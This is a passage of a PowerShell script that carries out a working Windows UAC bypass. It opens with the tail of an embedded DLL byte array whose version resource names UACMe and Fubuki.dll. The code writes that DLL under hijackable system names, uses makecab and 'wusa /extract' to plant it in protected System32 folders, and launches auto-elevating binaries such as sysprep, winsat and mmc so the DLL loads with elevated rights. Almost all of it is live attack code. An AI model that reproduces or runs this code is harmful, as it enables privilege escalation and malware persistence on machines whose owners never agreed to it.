0 67 0 111 0 112 0 121 0 114 0 105 0 103 0 104 0 116 0 32 0 40 0 67 0 41 0 32 0 50 0 48 0 49 0 52 0 32 0 45 0 50 0 48 0 49 0 53 0 32 0 85 0 71 0 32 0 78 0 111 0 114 0 116 0 104 0 0 0 62 0 11 0 1 0 79 0 114 0 105 0 103 0 105 0 110 0 97 0 108 0 70 0 105 0 108 0 101 0 110 0 97 0 109 0 101 0 0 0 70 0 117 0 98 0 117 0 107 0 105 0 46 0 100 0 108 0 108 0 0 0 0 0 44 0 6 0 1 0 80 0 114 0 111 0 100 0 117 0 99 0 116 0 78 0 97 0 109 0 101 0 0 0 0 0 85 0 65 0 67 0 77 0 101 0 0 0 52 0 8 0 1 0 80 0 114 0 111 0 100 0 117 0 99 0 116 0 86 0 101 0 114 0 115 0 105 0 111 0 110 0 0 0 49 0 46 0 57 0 46 0 48 0 46 0 48 0 0 0 68 0 0 0 1 0 86 0 97 0 114 0 70 0 105 0 108 0 101 0 73 0 110 0 102 0 111 0 0 0 0 0 36 0 4 0 0 0 84 0 114 0 97 0 110 0 115 0 108 0 97 0 116 0 105 0 111 0 110 0 0 0 0 0 9 4 176 4 60 63 120 109 108 32 118 101 114 115 105 111 110 61 39 49 46 48 39 32 101 110 99 111 100 105 110 103 61 39 85 84 70 45 56 39 32 115 116 97 110 100 97 108 111 110 101 61 39 121 101 115 39 63 62 13 10 60 97 115 115 101 109 98 108 121 32 120 109 108 110 115 61 39 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 49 39 32 109 97 110 105 102 101 115 116 86 101 114 115 105 111 110 61 39 49 46 48 39 62 13 10 32 32 60 116 114 117 115 116 73 110 102 111 32 120 109 108 
110 115 61 34 117 114 110 58 115 99 104 101 109 97 115 45 109 105 99 114 111 115 111 102 116 45 99 111 109 58 97 115 109 46 118 51 34 62 13 10 32 32 32 32 60 115 101 99 117 114 105 116 121 62 13 10 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 32 32 32 32 60 114 101 113 117 101 115 116 101 100 69 120 101 99 117 116 105 111 110 76 101 118 101 108 32 108 101 118 101 108 61 39 97 115 73 110 118 111 107 101 114 39 32 117 105 65 99 99 101 115 115 61 39 102 97 108 115 101 39 32 47 62 13 10 32 32 32 32 32 32 60 47 114 101 113 117 101 115 116 101 100 80 114 105 118 105 108 101 103 101 115 62 13 10 32 32 32 32 60 47 115 101 99 117 114 105 116 121 62 13 10 32 32 60 47 116 114 117 115 116 73 110 102 111 62 13 10 60 47 97 115 115 101 109 98 108 121 62 13 10 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 16 0 0 60 0 0 0 22 48 41 48 65 48 77 48 103 48 110 48 132 48 147 48 152 48 202 48 226 48 241 48 1 49 8 49 17 49 22 49 33 49 70 49 76 49 134 49 171 49 177 49 39 50 98 50 111 50 125 50 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0"
6778
6779
6780
6781 )
6782
6783 if ($CustomDll64)
6784 {
6785 Write-Verbose "Reading 64 bit DLL."
6786 [byte[]]$bytes = [System.IO.File]::ReadAllBytes($CustomDll64)
6787 $DllBytes64 = $bytes -join ' '
6788 }
6789 elseif ($CustomDll32)
6790 {
6791 Write-Verbose "Reading 32 bit DLL."
6792 [byte[]]$bytes = [System.IO.File]::ReadAllBytes($CustomDll32)
6793 $DllBytes32 = $bytes -join ' '
6794 }
6795
6796 if (([IntPtr]::Size) -eq 8)
6797 {
6798 Write-Verbose "64 bit process detected."
6799 $DllBytes = $DllBytes64
6800 }
6801 elseif (([IntPtr]::Size) -eq 4)
6802 {
6803 Write-Verbose "32 bit process detected."
6804 $DllBytes = $DllBytes32
6805 }
6806
6807 Out-File -FilePath $PayloadPath -InputObject $Payload -Encoding ascii
6808 $OSVersion = (Get-WmiObject -Class win32_OperatingSystem).BuildNumber
6809 switch($method)
6810 {
6811
6812 "Sysprep"
6813 {
6814 Write-Output "Using Sysprep method"
6815 if ($OSVersion -match "76")
6816 {
6817 Write-Verbose "Windows 7 found!"
6818 $dllname = "CRYPTBASE.dll"
6819 $PathToDll = "$env:temp\$dllname"
6820 Write-Verbose "Writing to $PathToDll"
6821 [Byte[]] $temp = $DllBytes -split ' '
6822 [System.IO.File]::WriteAllBytes($PathToDll, $temp)
6823 }
6824
6825 if ($OSVersion -match "96")
6826 {
6827 Write-Verbose "Windows 8 found!"
6828 $dllname = "shcore.dll"
6829 $PathToDll = "$env:temp\$dllname"
6830 Write-Verbose "Writing to $PathToDll"
6831 [Byte[]] $temp = $DllBytes -split ' '
6832 [System.IO.File]::WriteAllBytes($PathToDll, $temp)
6833 }
6834
6835 if ($OSVersion -match "10")
6836 {
6837 Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
6838 }
6839 $Target = "$env:temp\uac.cab"
6840 $wusapath = "C:\Windows\System32\Sysprep\"
6841 $execpath = "C:\Windows\System32\Sysprep\sysprep.exe"
6842 Write-Verbose "Creating cab $Target"
6843 $null = & makecab $PathToDll $Target
6844 Write-Verbose "Extracting cab to $wusapath "
6845 $null = & wusa $Target /extract:$wusapath
6846 Start-Sleep -Seconds 1
6847 Write-Verbose "Executing $execpath "
6848 & $execpath
6849 }
6850
6851 "OOBE"
6852 {
6853 Write-Output "Using OOBE method"
6854 Write-Verbose "Writing DLLs to Temp directory"
6855 if ($OSVersion -match "76")
6856 {
6857 Write-Verbose "Windows 7 found!"
6858 $dllname = "wdscore.dll"
6859 $PathToDll = "$env:temp\$dllname"
6860 Write-Verbose "Writing to $PathToDll"
6861 [Byte[]] $temp = $DllBytes -split ' '
6862 [System.IO.File]::WriteAllBytes($PathToDll, $temp)
6863 }
6864
6865 if ($OSVersion -match "96")
6866 {
6867 Write-Verbose "Windows 8 found!"
6868 $dllname = "wdscore.dll"
6869 $PathToDll = "$env:temp\$dllname"
6870 Write-Verbose "Writing to $PathToDll"
6871 [Byte[]] $temp = $DllBytes -split ' '
6872 [System.IO.File]::WriteAllBytes($PathToDll, $temp)
6873 }
6874
6875 if ($OSVersion -match "10")
6876 {
6877 Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
6878 }
6879 $Target = "$env:temp\uac.cab"
6880 $wusapath = "C:\Windows\System32\oobe\"
6881 $execpath = "C:\Windows\System32\oobe\setupsqm.exe"
6882 Write-Verbose "Creating cab $Target"
6883 $null = & makecab $PathToDll $Target
6884 Write-Verbose "Extracting cab to $wusapath "
6885 $null = & wusa $Target /extract:$wusapath
6886 Start-Sleep -Seconds 1
6887 Write-Verbose "Executing $execpath "
6888 & $execpath
6889 }
6890
6891 "ActionQueue"
6892 {
6893 Write-Output "Using Sysprep Actionqueue method"
6894 if ($OSVersion -match "76")
6895 {
6896 Write-Verbose "Windows 7 found!"
6897 $dllname = "ActionQueue.dll"
6898 $PathToDll = "$env:temp\$dllname"
6899 Write-Verbose "Writing to $PathToDll"
6900 [Byte[]] $temp = $DllBytes -split ' '
6901 [System.IO.File]::WriteAllBytes($PathToDll, $temp)
6902 }
6903
6904 if ($OSVersion -match "96")
6905 {
6906 Write-Warning "This method doesn't work Windows 8.1 onwards."
6907 }
6908
6909 if ($OSVersion -match "10")
6910 {
6911 Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
6912 }
6913 $Target = "$env:temp\uac.cab"
6914 $wusapath = "C:\Windows\System32\Sysprep\"
6915 $execpath = "C:\Windows\System32\Sysprep\sysprep.exe"
6916 Write-Verbose "Creating cab $Target"
6917 $null = & makecab $PathToDll $Target
6918 Write-Verbose "Extracting cab to $wusapath "
6919 $null = & wusa $Target /extract:$wusapath
6920 Start-Sleep -Seconds 1
6921 Write-Verbose "Executing $execpath "
6922 & $execpath
6923 }
6924
6925 "migwiz"
6926 {
6927 Write-Output "Using migwiz method"
6928 if ($OSVersion -match "76")
6929 {
6930 Write-Verbose "Windows 7 found!"
6931 $dllname = "wdscore.dll"
6932 $PathToDll = "$env:temp\$dllname"
6933 Write-Verbose "Writing to $PathToDll"
6934 [Byte[]] $temp = $DllBytes -split ' '
6935 [System.IO.File]::WriteAllBytes($PathToDll, $temp)
6936 }
6937
6938 if ($OSVersion -match "96")
6939 {
6940 Write-Verbose "Windows 8 found!"
6941 $dllname = "wdscore.dll"
6942 $PathToDll = "$env:temp\$dllname"
6943 Write-Verbose "Writing to $PathToDll"
6944 [Byte[]] $temp = $DllBytes -split ' '
6945 [System.IO.File]::WriteAllBytes($PathToDll, $temp)
6946 }
6947
6948 if ($OSVersion -match "10")
6949 {
6950 Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
6951 }
6952 $Target = "$env:temp\uac.cab"
6953 $wusapath = "C:\Windows\System32\migwiz\"
6954 $execpath = "C:\Windows\System32\migwiz\migwiz.exe"
6955 Write-Verbose "Creating cab $Target"
6956 $null = & makecab $PathToDll $Target
6957 Write-Verbose "Extracting cab to $wusapath "
6958 $null = & wusa $Target /extract:$wusapath
6959 Start-Sleep -Seconds 1
6960 Write-Verbose "Executing $execpath "
6961 & $execpath
6962 }
6963
6964 "cliconfg"
6965 {
6966 Write-Output "Using cliconfg method"
6967 if ($OSVersion -match "76")
6968 {
6969 Write-Verbose "Windows 7 found!"
6970 $dllname = "ntwdblib.dll"
6971 $PathToDll = "$env:temp\$dllname"
6972 Write-Verbose "Writing to $PathToDll"
6973 [Byte[]] $temp = $DllBytes -split ' '
6974 [System.IO.File]::WriteAllBytes($PathToDll, $temp)
6975 }
6976
6977 if ($OSVersion -match "96")
6978 {
6979 Write-Verbose "Windows 8 found!"
6980 $dllname = "ntwdblib.dll"
6981 $PathToDll = "$env:temp\$dllname"
6982 Write-Verbose "Writing to $PathToDll"
6983 [Byte[]] $temp = $DllBytes -split ' '
6984 [System.IO.File]::WriteAllBytes($PathToDll, $temp)
6985 }
6986
6987 if ($OSVersion -match "10")
6988 {
6989 Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
6990 }
6991 $Target = "$env:temp\uac.cab"
6992 $wusapath = "C:\Windows\System32\"
6993 $execpath = "C:\Windows\System32\cliconfg.exe"
6994 Write-Verbose "Creating cab $Target"
6995 $null = & makecab $PathToDll $Target
6996 Write-Verbose "Extracting cab to $wusapath "
6997 $null = & wusa $Target /extract:$wusapath
6998 Start-Sleep -Seconds 1
6999 Write-Verbose "Executing $execpath "
7000 & $execpath
7001 }
7002
7003 "winsat"
7004 {
7005 Write-Output "Using winsat method"
7006 if ($OSVersion -match "76")
7007 {
7008 Write-Verbose "Windows 7 found!"
7009 $dllname = "ntwdblib.dll"
7010 $PathToDll = "$env:temp\$dllname"
7011 Write-Verbose "Writing to $PathToDll"
7012 [Byte[]] $temp = $DllBytes -split ' '
7013 [System.IO.File]::WriteAllBytes($PathToDll, $temp)
7014 }
7015
7016 if ($OSVersion -match "96")
7017 {
7018 Write-Verbose "Windows 8 found!"
7019 $dllname = "devobj.dll"
7020 $PathToDll = "$env:temp\$dllname"
7021 Write-Verbose "Writing to $PathToDll"
7022 [Byte[]] $temp = $DllBytes -split ' '
7023 [System.IO.File]::WriteAllBytes($PathToDll, $temp)
7024 }
7025
7026 if ($OSVersion -match "10")
7027 {
7028 Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
7029 }
7030 $Target = "$env:temp\uac.cab"
7031 $wusapath = "C:\Windows\System32\sysprep\"
7032 $execpath = "C:\Windows\System32\sysprep\winsat.exe"
7033 $Targetwinsat = "$env:temp\uac_winsat.cab"
7034 Write-Verbose "Copying C:\Windows\System32\winsat.exe to $env:temp"
7035 Copy-Item "C:\Windows\System32\winsat.exe" "$env:temp\winsat.exe"
7036 Write-Verbose "Creating cab $Targetwinsat"
7037 $null = & makecab "$env:temp\winsat.exe" $Targetwinsat
7038 Write-Verbose "Extracting cab to $wusapath "
7039 $null = & wusa $Targetwinsat /extract:$wusapath
7040 Write-Verbose "Creating cab $Target"
7041 $null = & makecab $PathToDll $Target
7042 Write-Verbose "Extracting cab to $wusapath "
7043 $null = & wusa $Target /extract:$wusapath
7044 Start-Sleep -Seconds 1
7045 Write-Verbose "Executing $execpath "
7046 & $execpath
7047 }
7048
7049 "mmc"
7050 {
7051 Write-Output "Using mmc method"
7052 if ($OSVersion -match "76")
7053 {
7054 Write-Verbose "Windows 7 found!"
7055 $dllname = "ntwdblib.dll"
7056 $PathToDll = "$env:temp\$dllname"
7057 Write-Verbose "Writing to $PathToDll"
7058 [Byte[]] $temp = $DllBytes -split ' '
7059 [System.IO.File]::WriteAllBytes($PathToDll, $temp)
7060 }
7061
7062 if ($OSVersion -match "96")
7063 {
7064 Write-Verbose "Windows 8 found!"
7065 $dllname = "elsext.dll"
7066 $PathToDll = "$env:temp\$dllname"
7067 Write-Verbose "Writing to $PathToDll"
7068 [Byte[]] $temp = $DllBytes -split ' '
7069 [System.IO.File]::WriteAllBytes($PathToDll, $temp)
7070 }
7071
7072 if ($OSVersion -match "10")
7073 {
7074 Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
7075 }
7076 $Target = "$env:temp\uac.cab"
7077 $wusapath = "C:\Windows\System32\"
7078 $execpath = "C:\Windows\System32\mmc.exe eventvwr.msc"
7079 Write-Verbose "Creating cab $Target"
7080 $null = & makecab $PathToDll $Target
7081 Write-Verbose "Extracting cab to $wusapath "
7082 $null = & wusa $Target /extract:$wusapath
7083 Start-Sleep -Seconds 1
7084 Write-Verbose "Executing $execpath "
7085 & $execpath
7086 }
7087 }
7088
7089 #Clean up
7090 Write-Verbose "Removing $Target."
7091 Remove-Item -Path $Target
7092 Write-Verbose "Removing $PathToDll."
7093 Remove-Item -Path $PathToDll
7094 Write-Verbose "$wusapath$dllname must be removed manually."
7095 Write-Verbose "$PayloadPath must be removed manually."
7096
7097}